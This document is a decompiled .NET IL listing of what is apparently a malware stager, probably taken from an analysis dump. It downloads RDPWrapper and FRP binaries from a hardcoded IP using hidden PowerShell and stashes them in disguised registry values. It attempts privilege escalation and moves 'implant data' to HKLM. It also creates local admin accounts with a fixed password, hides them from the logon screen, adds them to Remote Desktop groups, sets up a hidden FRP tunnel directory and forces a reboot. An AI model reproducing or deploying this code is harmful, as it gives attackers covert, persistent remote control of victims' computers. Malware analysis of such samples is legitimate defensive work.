System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_51 ldloc.s V_51 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_51 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09A6: ldc.i4.1 ldloc.s V_51 brfalse.s IL_09A5: endfinally ldloc.s V_51 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Configured user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09E1: leave.s IL_09F1 stloc.s V_52 ldstr Error configuring candidate {0}: {1} ldloc.s V_45 ldloc.s V_52 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue 
IL_0773: ldloca.s V_41 leave.s IL_09F1: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_40 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_39 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_53 ldstr powershell ldstr -Command " ldloc.s V_53 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_54 ldloc.s V_54 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_54 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0A56: leave.s IL_0A64 ldc.i4.1 <null> stloc.s V_40 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A64: leave.s IL_0A7C ldloc.s V_54 brfalse.s IL_0A63: endfinally ldloc.s V_54 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0A7C: ldloc.s V_38 stloc.s V_55 ldstr Error checking for existing maintenance user: {0} ldloc.s V_55 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A7C: ldloc.s V_38 ldloc.s V_38 brtrue IL_0CDB: leave.s IL_0CF3 ldloc.s V_40 brtrue IL_0CDB: leave.s IL_0CF3 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_56 ldc.i4.0 <null> stloc.s V_57 br IL_0CC1: ldloc.s V_57 ldloc.s V_56 ldloc.s V_57 ldelem.ref <null> stloc.s V_58 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_58 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_39 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 
<null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_59 ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_59 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0C96: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0BAA: ldstr "powershell" ldloc.s V_60 brfalse.s IL_0BA9: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell 
ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C03: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_61 brfalse.s IL_0C02: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_62 ldloc.s V_62 ldloc.s V_58 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0C32: ldstr "gpupdate" ldloc.s V_62 brfalse.s IL_0C31: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> 
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_63 ldloc.s V_63 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C7F: ldc.i4.1 ldloc.s V_63 brfalse.s IL_0C7E: endfinally ldloc.s V_63 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Created and configured new user: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CCC: ldloc.s V_38 ldstr Failed to create user ldloc.s V_58 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CBB: ldloc.s V_57 ldloc.s V_59 brfalse.s IL_0CBA: endfinally ldloc.s V_59 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_57 ldc.i4.1 <null> add <null> stloc.s V_57 ldloc.s V_57 ldloc.s V_56 ldlen <null> conv.i4 <null> blt IL_0ABD: ldloc.s V_56 ldloc.s V_38 brtrue.s IL_0CDB: leave.s IL_0CF3 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_64 ldstr Error configuring user(s): {0} ldloc.s V_64 call System.String 
System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0D8A: leave.s IL_0D96 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D72: leave.s IL_0D96 ldloc.s V_65 brfalse.s IL_0D71: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0D96: ret stloc.s V_66 ldstr Error initiating reboot: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D96: ret leave.s IL_0D96: ret ldloc.0 <null> brfalse.s IL_0D95: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\Temp" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_7 ldstr Global\SystemStagerMutex stloc.s V_7 ldc.i4.1 <null> ldloc.s V_7 ldloca.s V_8 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_8 brtrue.s IL_0050: ldstr "C:\\Temp" leave IL_0D96: ret ldstr C:\Temp dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr log{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://185.102.115.146:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr 
callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_10 ldloc.s V_10 brfalse.s IL_0162: leave.s IL_0170 ldloc.s V_10 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0162: leave.s IL_0170 ldc.i4.1 <null> stloc.s V_5 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0170: ldloc.s V_5 ldloc.s V_10 brfalse.s IL_016F: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_5 brtrue IL_01FC: ldc.i4.0 ldstr Downloading RDPWrapper... 
ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconSizeVersion1',(iwr ' ldloc.3 <null> ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldstr Running download command: ldloc.s V_11 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w Hidden -Command " ldloc.s V_11 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 stloc.s V_12 ldstr Error downloading RDPWrapper: {0} ldloc.s V_12 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 ldc.i4.0 <null> stloc.s V_6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 brfalse.s 
IL_0231: leave.s IL_023F ldloc.s V_13 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0231: leave.s IL_023F ldc.i4.1 <null> stloc.s V_6 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_023F: ldloc.s V_6 ldloc.s V_13 brfalse.s IL_023E: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brtrue IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconUnderlineVersion1',(iwr ' ldloc.s V_4 ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_14 ldstr Running FRP download command: ldloc.s V_14 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w h -c " ldloc.s V_14 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void 
StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_15 ldstr Error downloading FRP binary: {0} ldloc.s V_15 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0319: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret stloc.s V_16 ldstr Error in escalation: {0} ldloc.s V_16 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0396: leave.s IL_03A4 ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0396: leave.s IL_03A4 ldsfld 
Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0388: leave.s IL_0396 ldloc.s V_19 ldstr ShellStateVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0396: leave.s IL_03A4 ldloc.s V_19 brfalse.s IL_0395: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03A4: leave.s IL_03BC ldloc.s V_17 brfalse.s IL_03A3: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03BC: nop stloc.s V_20 ldstr Error moving registry data: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_03BC: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_042F: leave.s IL_043D ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_042F: leave.s IL_043D ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt 
Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_0421: leave.s IL_042F ldloc.s V_23 ldstr IconSizeVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_042F: leave.s IL_043D ldloc.s V_23 brfalse.s IL_042E: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_043D: leave.s IL_0455 ldloc.s V_21 brfalse.s IL_043C: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0455: nop stloc.s V_24 ldstr Error moving RDPWrapper data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0455: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_04C8: leave.s IL_04D6 ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_04C8: leave.s IL_04D6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_04BA: leave.s IL_04C8 ldloc.s 
V_27 ldstr IconUnderlineVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04C8: leave.s IL_04D6 ldloc.s V_27 brfalse.s IL_04C7: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04D6: leave.s IL_04EE ldloc.s V_25 brfalse.s IL_04D5: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_28 ldstr Error moving FRP data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_29 ldloc.s V_29 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_30 ldloc.s V_29 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_053E: ldloc.s V_30 ldloc.s V_29 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_29 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void 
